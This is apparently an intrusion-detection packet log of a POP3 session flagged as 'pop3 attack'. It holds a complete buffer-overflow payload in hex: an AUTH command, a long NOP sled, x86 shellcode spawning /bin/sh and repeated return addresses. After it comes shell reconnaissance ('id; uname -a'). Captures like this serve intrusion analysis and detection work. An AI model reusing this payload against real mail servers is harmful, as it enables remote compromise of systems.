09/28-10:46:59.979995 0:B0:D0:11:CB:4B -> 0:D0:9:27:66:18 type:0x800 len:0x4A 192.168.64.24:3109 -> 192.168.128.50:110 TCP TTL:63 TOS:0x0 ID:33789 DF **S***** Seq: 0xC93C8B90 Ack: 0x0 Win: 0x7D78 TCP Options => MSS: 1460 SackOK TS: 58498365 0 NOP WS: 0 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/28-10:46:59.980314 0:B0:D0:11:CB:4B -> 0:D0:9:27:66:18 type:0x800 len:0x42 192.168.64.24:3109 -> 192.168.128.50:110 TCP TTL:63 TOS:0x0 ID:33790 DF ******A* Seq: 0xC93C8B91 Ack: 0xC9568D66 Win: 0x7D78 TCP Options => NOP NOP TS: 58498365 58506120 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/28-10:46:59.990797 0:B0:D0:11:CB:4B -> 0:D0:9:27:66:18 type:0x800 len:0x42 192.168.64.24:3109 -> 192.168.128.50:110 TCP TTL:63 TOS:0x0 ID:33791 DF ******A* Seq: 0xC93C8B91 Ack: 0xC9568D97 Win: 0x7D47 TCP Options => NOP NOP TS: 58498366 58506121 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ [**] pop3 attack [**] 09/28-10:46:59.991293 0:B0:D0:11:CB:4B -> 0:D0:9:27:66:18 type:0x800 len:0x420 192.168.64.24:3109 -> 192.168.128.50:110 TCP TTL:63 TOS:0x0 ID:33792 DF *****PA* Seq: 0xC93C8B91 Ack: 0xC9568D97 Win: 0x7D78 TCP Options => NOP NOP TS: 58498366 58506121 41 55 54 48 20 90 90 90 90 90 90 90 90 90 90 90 AUTH ........... 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 EB 1B 5E 89 F3 89 F7 83 C7 07 29 C0 AA 89 ....^.......)... F9 89 F0 AB 89 FA 29 C0 AB B0 08 04 03 CD 80 E8 ......)......... E0 FF FF FF 2F 62 69 6E 2F 73 68 90 90 90 90 90 ..../bin/sh..... 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 38 D5 ..............8. FF BF 38 D5 FF BF 38 D5 FF BF 38 D5 FF BF 38 D5 ..8...8...8...8. FF BF 38 D5 FF BF 38 D5 FF BF 38 D5 FF BF 38 D5 ..8...8...8...8. FF BF 38 D5 FF BF 38 D5 FF BF 38 D5 FF BF 38 D5 ..8...8...8...8. FF BF 38 D5 FF BF 38 D5 FF BF 38 D5 FF BF 38 D5 ..8...8...8...8. FF BF 38 D5 FF BF 38 D5 FF BF 38 D5 FF BF 38 D5 ..8...8...8...8. FF BF 38 D5 FF BF 38 D5 FF BF 38 D5 FF BF 38 D5 ..8...8...8...8. FF BF 38 D5 FF BF 38 D5 FF BF 38 D5 FF BF 38 D5 ..8...8...8...8. FF BF 38 D5 FF BF 38 D5 FF BF 38 D5 FF BF 38 D5 ..8...8...8...8. FF BF 38 D5 FF BF 90 90 90 90 90 90 0A 0A ..8........... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/28-10:46:59.999606 0:B0:D0:11:CB:4B -> 0:D0:9:27:66:18 type:0x800 len:0x42 192.168.64.24:3109 -> 192.168.128.50:110 TCP TTL:63 TOS:0x0 ID:33793 DF ******A* Seq: 0xC93C8F6F Ack: 0xC9569197 Win: 0x7D78 TCP Options => NOP NOP TS: 58498367 58506121 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/28-10:47:04.999334 0:B0:D0:11:CB:4B -> 0:D0:9:27:66:18 type:0x800 len:0x47 192.168.64.24:3109 -> 192.168.128.50:110 TCP TTL:63 TOS:0x0 ID:33796 DF *****PA* Seq: 0xC93C8F6F Ack: 0xC9569197 Win: 0x7D78 TCP Options => NOP NOP TS: 58498867 58506121 0A 69 64 3B 0A .id;. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/28-10:47:05.005272 0:B0:D0:11:CB:4B -> 0:D0:9:27:66:18 type:0x800 len:0x56 192.168.64.24:3109 -> 192.168.128.50:110 TCP TTL:63 TOS:0x0 ID:33797 DF *****PA* Seq: 0xC93C8F74 Ack: 0xC95691BE Win: 0x7D78 TCP Options => NOP NOP TS: 58498867 58506622 69 64 3B 20 75 6E 61 6D 65 20 2D 61 3B 20 63 64 id; uname -a; cd 20 2F 3B 0A /;. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/28-10:47:05.029203 0:B0:D0:11:CB:4B -> 0:D0:9:27:66:18 type:0x800 len:0x42 192.168.64.24:3109 -> 192.168.128.50:110 TCP TTL:63 TOS:0x0 ID:33798 DF ******A* Seq: 0xC93C8F88 Ack: 0xC95691E5 Win: 0x7D78 TCP Options => NOP NOP TS: 58498870 58506623 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/28-10:47:05.049197 0:B0:D0:11:CB:4B -> 0:D0:9:27:66:18 type:0x800 len:0x42 192.168.64.24:3109 -> 192.168.128.50:110 TCP TTL:63 TOS:0x0 ID:33800 DF ******A* Seq: 0xC93C8F88 Ack: 0xC9569229 Win: 0x7D78 TCP Options => NOP NOP TS: 58498872 58506625 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+